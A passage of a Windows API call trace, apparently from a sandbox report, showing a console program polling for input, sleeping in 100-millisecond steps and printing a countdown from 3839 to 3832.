[0247.457] _fileno (_File=0x757a2920) returned 1
[0247.457] _errno () returned 0x5507d8
[0247.457] _get_osfhandle (_FileHandle=1) returned 0x4c
[0247.457] _errno () returned 0x5507d8
[0247.457] GetFileType (hFile=0x4c) returned 0x2
[0247.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0247.457] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0247.457] lstrlenW (lpString="\x08\x08\x08\x083839") returned 8
[0247.566] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.566] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0247.566] Sleep (dwMilliseconds=0x64)
[0247.675] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.675] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0247.675] Sleep (dwMilliseconds=0x64)
[0247.784] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.784] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0247.784] Sleep (dwMilliseconds=0x64)
[0247.893] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0247.893] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0247.893] Sleep (dwMilliseconds=0x64)
[0248.002] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.003] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0248.003] Sleep (dwMilliseconds=0x64)
[0248.111] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.112] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0248.112] Sleep (dwMilliseconds=0x64)
[0248.231] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.231] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0248.231] Sleep (dwMilliseconds=0x64)
[0248.330] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.330] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0248.330] Sleep (dwMilliseconds=0x64)
[0248.439] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.439] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6052
[0248.439] Sleep (dwMilliseconds=0x64)
[0248.548] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.548] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0248.549] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083838") returned 8
[0248.549] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0248.549] __iob_func () returned 0x757a2900
[0248.549] _fileno (_File=0x757a2920) returned 1
[0248.549] _errno () returned 0x5507d8
[0248.549] _get_osfhandle (_FileHandle=1) returned 0x4c
[0248.549] _errno () returned 0x5507d8
[0248.549] GetFileType (hFile=0x4c) returned 0x2
[0248.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0248.549] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0248.549] lstrlenW (lpString="\x08\x08\x08\x083838") returned 8
[0248.657] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.658] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0248.658] Sleep (dwMilliseconds=0x64)
[0248.767] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.767] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0248.767] Sleep (dwMilliseconds=0x64)
[0248.876] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.876] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0248.876] Sleep (dwMilliseconds=0x64)
[0248.985] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0248.985] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0248.985] Sleep (dwMilliseconds=0x64)
[0249.094] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.095] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0249.095] Sleep (dwMilliseconds=0x64)
[0249.203] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.204] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0249.204] Sleep (dwMilliseconds=0x64)
[0249.313] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.313] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0249.313] Sleep (dwMilliseconds=0x64)
[0249.422] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.422] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6053
[0249.422] Sleep (dwMilliseconds=0x64)
[0249.531] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.531] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0249.531] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083837") returned 8
[0249.531] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0249.531] __iob_func () returned 0x757a2900
[0249.532] _fileno (_File=0x757a2920) returned 1
[0249.532] _errno () returned 0x5507d8
[0249.532] _get_osfhandle (_FileHandle=1) returned 0x4c
[0249.532] _errno () returned 0x5507d8
[0249.532] GetFileType (hFile=0x4c) returned 0x2
[0249.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0249.532] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0249.532] lstrlenW (lpString="\x08\x08\x08\x083837") returned 8
[0249.640] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.641] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0249.641] Sleep (dwMilliseconds=0x64)
[0249.758] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.758] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0249.758] Sleep (dwMilliseconds=0x64)
[0249.860] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.860] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0249.860] Sleep (dwMilliseconds=0x64)
[0249.991] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0249.992] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0249.992] Sleep (dwMilliseconds=0x64)
[0250.124] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0250.124] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0250.124] Sleep (dwMilliseconds=0x64)
[0250.264] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0250.264] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0250.264] Sleep (dwMilliseconds=0x64)
[0250.405] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0250.405] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6054
[0250.405] Sleep (dwMilliseconds=0x64)
[0250.545] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0250.545] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6055
[0250.545] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083836") returned 8
[0250.545] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0250.545] __iob_func () returned 0x757a2900
[0250.545] _fileno (_File=0x757a2920) returned 1
[0250.545] _errno () returned 0x5507d8
[0250.545] _get_osfhandle (_FileHandle=1) returned 0x4c
[0250.545] _errno () returned 0x5507d8
[0250.546] GetFileType (hFile=0x4c) returned 0x2
[0250.546] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0250.546] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0250.546] lstrlenW (lpString="\x08\x08\x08\x083836") returned 8
[0250.685] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0250.686] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6055
[0250.686] Sleep (dwMilliseconds=0x64)
[0250.825] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0250.825] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6055
[0250.825] Sleep (dwMilliseconds=0x64)
[0250.982] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0250.982] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6055
[0250.982] Sleep (dwMilliseconds=0x64)
[0251.153] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0251.154] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6055
[0251.154] Sleep (dwMilliseconds=0x64)
[0251.341] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0251.341] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6055
[0251.341] Sleep (dwMilliseconds=0x64)
[0251.512] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0251.512] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6056
[0251.512] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083835") returned 8
[0251.513] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0251.513] __iob_func () returned 0x757a2900
[0251.513] _fileno (_File=0x757a2920) returned 1
[0251.513] _errno () returned 0x5507d8
[0251.513] _get_osfhandle (_FileHandle=1) returned 0x4c
[0251.513] _errno () returned 0x5507d8
[0251.513] GetFileType (hFile=0x4c) returned 0x2
[0251.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0251.513] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0251.513] lstrlenW (lpString="\x08\x08\x08\x083835") returned 8
[0251.700] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0251.700] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6056
[0251.700] Sleep (dwMilliseconds=0x64)
[0251.862] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0251.862] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6056
[0251.862] Sleep (dwMilliseconds=0x64)
[0251.967] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0251.967] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6056
[0251.967] Sleep (dwMilliseconds=0x64)
[0252.074] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.075] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6056
[0252.075] Sleep (dwMilliseconds=0x64)
[0252.200] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.201] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6056
[0252.201] Sleep (dwMilliseconds=0x64)
[0252.339] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.339] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6056
[0252.339] Sleep (dwMilliseconds=0x64)
[0252.464] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.464] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0252.464] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083834") returned 8
[0252.464] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0252.464] __iob_func () returned 0x757a2900
[0252.464] _fileno (_File=0x757a2920) returned 1
[0252.464] _errno () returned 0x5507d8
[0252.464] _get_osfhandle (_FileHandle=1) returned 0x4c
[0252.464] _errno () returned 0x5507d8
[0252.464] GetFileType (hFile=0x4c) returned 0x2
[0252.464] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0252.464] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0252.465] lstrlenW (lpString="\x08\x08\x08\x083834") returned 8
[0252.588] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.589] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0252.589] Sleep (dwMilliseconds=0x64)
[0252.729] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.729] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0252.729] Sleep (dwMilliseconds=0x64)
[0252.841] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.841] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0252.841] Sleep (dwMilliseconds=0x64)
[0252.978] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0252.979] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0252.979] Sleep (dwMilliseconds=0x64)
[0253.088] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.088] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0253.088] Sleep (dwMilliseconds=0x64)
[0253.210] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.210] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0253.210] Sleep (dwMilliseconds=0x64)
[0253.306] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.306] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0253.306] Sleep (dwMilliseconds=0x64)
[0253.415] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.415] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6057
[0253.416] Sleep (dwMilliseconds=0x64)
[0253.524] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.525] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0253.525] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083833") returned 8
[0253.525] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0253.525] __iob_func () returned 0x757a2900
[0253.525] _fileno (_File=0x757a2920) returned 1
[0253.525] _errno () returned 0x5507d8
[0253.525] _get_osfhandle (_FileHandle=1) returned 0x4c
[0253.525] _errno () returned 0x5507d8
[0253.525] GetFileType (hFile=0x4c) returned 0x2
[0253.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0253.525] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0253.525] lstrlenW (lpString="\x08\x08\x08\x083833") returned 8
[0253.647] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.647] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0253.647] Sleep (dwMilliseconds=0x64)
[0253.743] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.743] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0253.743] Sleep (dwMilliseconds=0x64)
[0253.852] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.852] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0253.852] Sleep (dwMilliseconds=0x64)
[0253.961] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0253.961] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0253.961] Sleep (dwMilliseconds=0x64)
[0254.071] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.071] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0254.071] Sleep (dwMilliseconds=0x64)
[0254.180] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.180] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0254.180] Sleep (dwMilliseconds=0x64)
[0254.289] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.289] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0254.289] Sleep (dwMilliseconds=0x64)
[0254.399] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.399] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6058
[0254.399] Sleep (dwMilliseconds=0x64)
[0254.508] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.508] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0254.508] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083832") returned 8
[0254.508] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0254.508] __iob_func () returned 0x757a2900
[0254.508] _fileno (_File=0x757a2920) returned 1
[0254.508] _errno () returned 0x5507d8
[0254.508] _get_osfhandle (_FileHandle=1) returned 0x4c
[0254.508] _errno () returned 0x5507d8
[0254.508] GetFileType (hFile=0x4c) returned 0x2
[0254.508] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0254.508] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0254.508] lstrlenW (lpString="\x08\x08\x08\x083832") returned 8
[0254.617] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.617] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0254.617] Sleep (dwMilliseconds=0x64)
[0254.726] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.727] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0254.727] Sleep (dwMilliseconds=0x64)
[0254.835] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.835] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0254.835] Sleep (dwMilliseconds=0x64)
[0254.944] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0254.944] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0254.945] Sleep (dwMilliseconds=0x64)
[0255.054] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.054] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0255.054] Sleep (dwMilliseconds=0x64)
